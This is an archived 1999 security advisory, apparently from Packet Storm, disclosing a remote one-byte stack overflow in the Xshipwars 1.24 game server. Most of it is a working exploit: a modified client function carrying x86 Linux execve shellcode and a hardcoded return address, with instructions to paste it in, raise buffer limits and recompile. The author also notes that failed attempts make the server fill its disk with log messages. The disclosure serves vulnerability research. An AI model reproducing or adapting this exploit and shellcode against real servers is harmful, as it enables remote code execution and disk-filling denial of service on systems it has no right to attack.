Xshipwars remote overflow - Xshipwars 1.24 and below are vulnerable.
570e24a8dbcd431683104d021788b7b6200baf92b06d7840b3ed5ec4190fb39bDate: Tue, 7 Dec 1999 22:31:02 -0600
To: news@technotronic.com
From: Amanda Woodward <amandawoodward2@altavista.com>
X-Mailer: Web Mail 3.3
Subject: xsw 1.24 remote buffer overflow
Xshipwars remote overflow. Found and written by Amanda Woodward.
(amandawoodward2@altavista.com)
Latest Server Version Tested: 1.24
(This was the bug they fixed for 1.25)
Xshipwars is a server/client combination that allows you to play
a little game with good sounds and graphics over tcp/ip on linux
or windows or whatever. They give out source to the clients and
the server. It's in playable beta and there are public servers
on mit.edu and a few other places.
See: http://fox.mit.edu/xsw/
If you replace this function in netsend.c with the stuff at the bottom
of this file, log into your (or another) server and type "e" and then
hit enter in the dialog box, it will crash, possibly running the
shellcode, which currently calls /tmp/xx. Shellcode could
be created that does something more interesting, but this is
just a demo exploit.
I'm sure other parts of the protocol have problems as well. This
one was interesting because it's a one byte overflow against esp
which gives you the eip a bit later. If you go OVER that one byte,
you don't get eip. If you go under, then it overwrites with other
random things. Trust me.
If the offset is off for your box, then the server will still crash,
and will begin an endless loop of sending itself log messages,
filling up whatever space it can on whatever partition it's installed
on. This is less than optimal behavior, so quickly find and kill the
server if your exploit fails.
Love,
A. Woodward, Dec 1999
<cut this and paste it into your client's source file, modify your
.h's to raise the limit on a few variables (grep for 256 and turn them
into 2560), recompile, and enjoy>
/*
* Sends a literal command.
*/
/*hacked to send our attack buffer!*/
int
NetSendExec(char *arg)
{
char larg[CS_MESG_MAX];
char sndbuf[CS_DATA_MAX_LEN];
char exploitbuf[CS_DATA_MAX_LEN];
int i;
/*test shellcode. No whitespace, just exec's /tmp/xx. If it's not
there, does random things. Replace this for slightly more
fun. ;> */
char code[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
"\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/tmp/xx";
#define SIZEOFBUF 229
memset(exploitbuf,0x41,SIZEOFBUF);
#define SHELLSTART 50
memcpy(exploitbuf+SHELLSTART,code,strlen(code));
/*Return to: 0xbfffebe4 Your Kilometerage May Vary*/
exploitbuf[132]=0xe4;
exploitbuf[133]=0xeb;
exploitbuf[134]=0xff;
exploitbuf[135]=0xbf;
exploitbuf[SIZEOFBUF-1]=0;
/*
if(arg == NULL)
return(-1);
if(arg[0] == '\0')
return(-2);
*/
/*strncpy(larg, arg, CS_MESG_MAX);*/
strncpy(larg, exploitbuf, CS_MESG_MAX);
larg[CS_MESG_MAX - 1] = '\0';
/*
* NET_CMD_EXEC format is as follows:
*
* argument
*/
sprintf(sndbuf, "%i %s\n",
CS_CODE_LITERALCMD,
larg
);
NetSendData(sndbuf);
return(0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed